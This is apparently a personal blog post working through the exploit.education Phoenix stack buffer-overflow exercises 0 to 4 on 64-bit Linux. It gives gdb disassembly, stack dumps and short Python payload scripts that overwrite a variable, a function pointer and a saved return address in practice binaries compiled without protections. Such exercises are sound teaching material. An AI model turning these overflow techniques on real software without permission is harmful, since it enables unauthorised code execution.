Categories
Security

Buffer Overflow Prelude: exploit.education Phoenix 0-4 – Intel 64-Bit

I’ll outline my progress in binary exploitation on Linux. As a target I’m using the Phoenix exercises from exploit.education which can be found at http://exploit.education/phoenix/. However, I don’t use the provided virtual machines but rather copy the code to my local VM. This requires some small changes to the listed code examples, most notably uncommenting the printf() with the BANNER message. One of the reasons for writing this blog post (apart from documenting my process) is the fact that most tutorials I found either use AT&T syntax for the assembly or 32-bit code and I wanted to use Intel syntax on a 64-bit system. I also want to use Python 3 as my scripting language of choice.

Buffer Overflows

The first type of binary exploits that are covered in the exercises are stack based buffer overflows. The canonical tutorial for buffer overflows titled “Smashing the Stack for Fun and Profit” can be found in Phrack 49×14 [1]. The basic idea is to put more data into a buffer than expected and thus have this data flow into areas of memory where it is not supposed to be. Modern day Linux has various protection mechanisms that protect against buffer overflows (like canaries, address space layout randomization and non-executable stacks). To “get around” these mechanisms for exercise purposes, I’m compiling the binaries with the following settings:

gcc -fno-stack-protector -no-pie -z execstack -o phoenix_stack0 phoenix_stack0.c

Disassembly

The disassembly of the main() function of Phoenix 0 (disass main) in gdb shows how the stack is created. Note that I prefer Intel syntax which can be enabled within gdb with set disassembly-flavor intel. We set three breakpoints one at the beginning of main() (b *main) and one before (b *0x0000000000401163) and one after (b *0x0000000000401168) the call to gets().

0x0000000000401146 <+0>:   push  rbp
0x0000000000401147 <+1>:   mov   rbp,rsp
0x000000000040114a <+4>:   sub   rsp,0x60
0x000000000040114e <+8>:   mov   DWORD PTR [rbp-0x54],edi
0x0000000000401151 <+11>:  mov   QWORD PTR [rbp-0x60],rsi
0x0000000000401155 <+15>:  mov   DWORD PTR [rbp-0x10],0x0
0x000000000040115c <+22>:  lea   rax,[rbp-0x50]
0x0000000000401160 <+26>:  mov   rdi,rax
0x0000000000401163 <+29>:  call  0x401040 <gets@plt>
0x0000000000401168 <+34>:  mov   eax,DWORD PTR [rbp-0x10]
0x000000000040116b <+37>:  test  eax,eax
0x000000000040116d <+39>:  je    0x401180 <main+58>
0x000000000040116f <+41>:  lea   rax,[rip+0xe92] # 0x402008
0x0000000000401176 <+48>:  mov   rdi,rax
0x0000000000401179 <+51>:  call  0x401030 <puts@plt>
0x000000000040117e <+56>:  jmp   0x40118f <main+73>
0x0000000000401180 <+58>:  lea   rax,[rip+0xeb9] # 0x402040
0x0000000000401187 <+65>:  mov   rdi,rax
0x000000000040118a <+68>:  call  0x401030 <puts@plt>
0x000000000040118f <+73>:  mov   edi,0x0
0x0000000000401194 <+78>:  call  0x401050 <exit@plt>

In the code, the base pointer (rbp) which represents the bottom of the previous stack is pushed onto the stack so that it can be restored later (<+0>). The push instruction also decreases rsp to point to the new top of the stack. Next, the stack pointer (rsp) is moved into rbp which creates a new base for our new stack which is used for main() (<+1>). Next, 0x60 (96 decimal or 24 words if a word is 4 byte) is subtracted from rsp and thus that’s the space that is reserved for the stack (<+4>).

According to the 64bit ABI [2], the first six arguments of functions are stored in registers. rdi (and thus edi) contains the first argument to a function and rsi contains the second argument (the 3rd, 4th, 5th and 6th arguments are stored in rdx, rcx, r8 and r9). Since this is the main() function, those are argc (edi) and **argv (rsi) respectively. Next, the arguments are moved from registers to memory. edi/argc is moved to the memory at [rbp-0x54] (<+8)> and rsi / **argv is moved to the memory at [rbp-0x60] (<+11>). After that, locals.changeme (at rbp-0x10) is set to 0 (<+15>). Finally, locals.buffer (at rbp-0x50) is loaded to eax (<+22>) and eax is moved into rdi to make this the first argument for the next function call (<+26>) which is gets() (<+29>).

Stack

On x86, the stack “grows” from high numbers to low numbers. Thus, the bottom of the stack (rbp points to the bottom) has a higher number in address space than the top (rsp points to the top). You can check the allocated memory for the stack in gdb by running info proc mappings and find more information about the stack frame by issuing info frame n where n is the number of the frame (all frames can be listed by running bt). In gdb, running x/30wx $rsp will display the next 30 words of memory starting at $rsp and display everything in hex. Note that gdb displays the high memory addresses at the bottom (so you can visualize the stack growing up) and each group of 8 hex digits represents one word (4 bytes) because two hex digits represent one byte.

At this point in time, the stack looks like this:

  • rbp is at 0x7fffffffde80
  • locals.changeme (rbp-0x10) is at 0x7fffffffde70 (0x00000000)
  • The space for locals.buffer (rbp-0x50) starts at 0x7fffffffde30
  • argc (rbp-0x10) is at 0x7fffffffde2c (0x00000001)
  • **argv (rbp-0x60) is at 0x7fffffffde20
  • rsp is at 0x7fffffffde20
(gdb) x/30wx $rsp
0x7fffffffde20:0xffffdf78 0x00007fff 0x00000000	0x00000001
0x7fffffffde30:0x00000000 0x00000000 0x00000000	0x00000000
0x7fffffffde40:0x00000000 0x00000000 0x004011e5	0x00000000
0x7fffffffde50:0x00000000 0x00000000 0x004011a0 0x00000000
0x7fffffffde60:0x00000000 0x00000000 0x00401060	0x00000000
0x7fffffffde70:0x00000000 0x00007fff 0x00000000 0x00000000
0x7fffffffde80:0x00000000 0x00000000 0xf7dfd7fd	0x00007fff

In order to overflow locals.buffer (which starts at 0x7fffffffde30 or rbp-0x50) and write to locals.changeme (located at 0x7fffffffde70 or rbp-0x10), we have to send > 16 words to gets() because (0x50-0x10)/4 = 16. So if we input the following string (note that each character is one byte so a block like AAAA is four bytes or one word): “AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQ”, this should overwrite locals.changeme.

0x7fffffffde20:0xffffdf78 0x00007fff 0x00000000	0x00000001
0x7fffffffde30:0x41414141 0x42424242 0x43434343	0x44444444
0x7fffffffde40:0x45454545 0x46464646 0x47474747	0x48484848
0x7fffffffde50:0x49494949 0x4a4a4a4a 0x4b4b4b4b 0x4c4c4c4c
0x7fffffffde60:0x4d4d4d4d 0x4e4e4e4e 0x4f4f4f4f 0x50505050
0x7fffffffde70:0x51515151 0x00007f00 0x00000000	0x00000000
0x7fffffffde80:0x00000000 0x00000000 0xf7dfd7fd	0x00007fff
0x7fffffffde90:0xffffdf78 0x00007fff

And indeed this does the trick.

(gdb) c
Continuing.
Well done, the 'changeme' variable has been changed!

Command line exploit

With this information, it is possible to exploit the program without gdb by passing this string on the command line.

└─$ python -c "print('AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQ')" | ./phoenix_stack0
Well done, the 'changeme' variable has been changed!

Phoenix 1

Phoenix 1 is similar to Phoenix 0, except we are supposed to change locals.changeme to the specific byte sequence 0x496c5962. Since everything else is the same, we already know that our padding before we reach locals.changeme is 16 words or 64 bytes. The following python script will produce the string that we need:

#!/usr/bin/python

import struct

pad = "\x41" * 64
payload = struct.pack("I", 0x496c5962)
print(pad+payload.decode())

We save the script as shell_maker.py and make it executable with chmod +x and voila:

└─$ ./phoenix_stack1 `./shell_maker.py`                            
Well done, you have successfully set changeme to the correct value

Phoenix 2

Phoenix 2 is similar to Phoenix 0 and 1, except that we are supposed to overflow the buffer from an environment variable and change locals.changeme to 0x0d0a090a. So we simply change the payload in our script to 0x0d0a090a, set the environment variable and run the code.

└─$ export ExploitEducation=`./shell_maker.py`
└─$ ./phoenix_stack2                          
Well done, you have successfully set changeme to the correct value

Phoenix 3

For Phoenix 3, we are asked to override a function pointer (a slight change in the printf of complete_level is required to get the program to run). To find the correct address, we can use gdb and simply disass complete_level:

Dump of assembler code for function complete_level:
   0x0000000000401166 <+0>:	push   rbp
   0x0000000000401167 <+1>:	mov    rbp,rsp
   0x000000000040116a <+4>:	lea    rax,[rip+0xe97]        # 0x402008
   0x0000000000401171 <+11>:	mov    rdi,rax
   0x0000000000401174 <+14>:	call   0x401030 <puts@plt>
   0x0000000000401179 <+19>:	mov    edi,0x0
   0x000000000040117e <+24>:	call   0x401070 <exit@plt>
End of assembler dump.

Now that we know that our address is 0x401166, we can simply change the payload in shell_maker.py to this value and run the following:

└─$ ./shell_maker.py | ./phoenix_stack3   
calling function pointer @ 0x401166
Congratulations, you've finished :-) Well done!

Phoenix 4

Phoenix 4 requires us to overwrite the saved instruction pointer. After setting breakpoints on main() and before and after the call to gets(), we can supply a long string and see what happens. We supply “AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ” and check the backtrace with bt.

(gdb) bt
#0  0x00000000004011ac in start_level ()
#1  0x5858585857575757 in ?? ()
#2  0x5a5a5a5a59595959 in ?? ()
#3  0x0000000100000000 in ?? ()
#4  0x0000000000000000 in ?? ()

As we can see, frame one gets overwritten by 0x57s. Python tells us, that this is the ASCII character ‘W’ and we can calculate the length of our padding to be 88 bytes.

>>> chr(0x57)
'W'
>>> len('AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVV')
88

Back in gdb, we find the address of complete_level(), which is 0x401156.

(gdb) disass complete_level 
Dump of assembler code for function complete_level:
   0x0000000000401156 <+0>:	push   rbp
   0x0000000000401157 <+1>:	mov    rbp,rsp
   0x000000000040115a <+4>:	lea    rax,[rip+0xea7]        # 0x402008
   0x0000000000401161 <+11>:	mov    rdi,rax
   0x0000000000401164 <+14>:	call   0x401030 <puts@plt>
   0x0000000000401169 <+19>:	mov    edi,0x0
   0x000000000040116e <+24>:	call   0x401060 <exit@plt>
End of assembler dump.

Armed with these two pieces of information, we can change our shell_maker.py and run it.

#!/usr/bin/python

import struct

pad = "\x41" * 88
payload = struct.pack("I", 0x401156)
print(pad+payload.decode())
└─$ ./shell_maker.py | ./phoenix_stack4                                             
and will be returning to 0x401156
Congratulations, you've finished :-) Well done!

[1] http://phrack.org/issues/49/14.html

[2] https://raw.githubusercontent.com/wiki/hjl-tools/x86-psABI/x86-64-psABI-1.0.pdf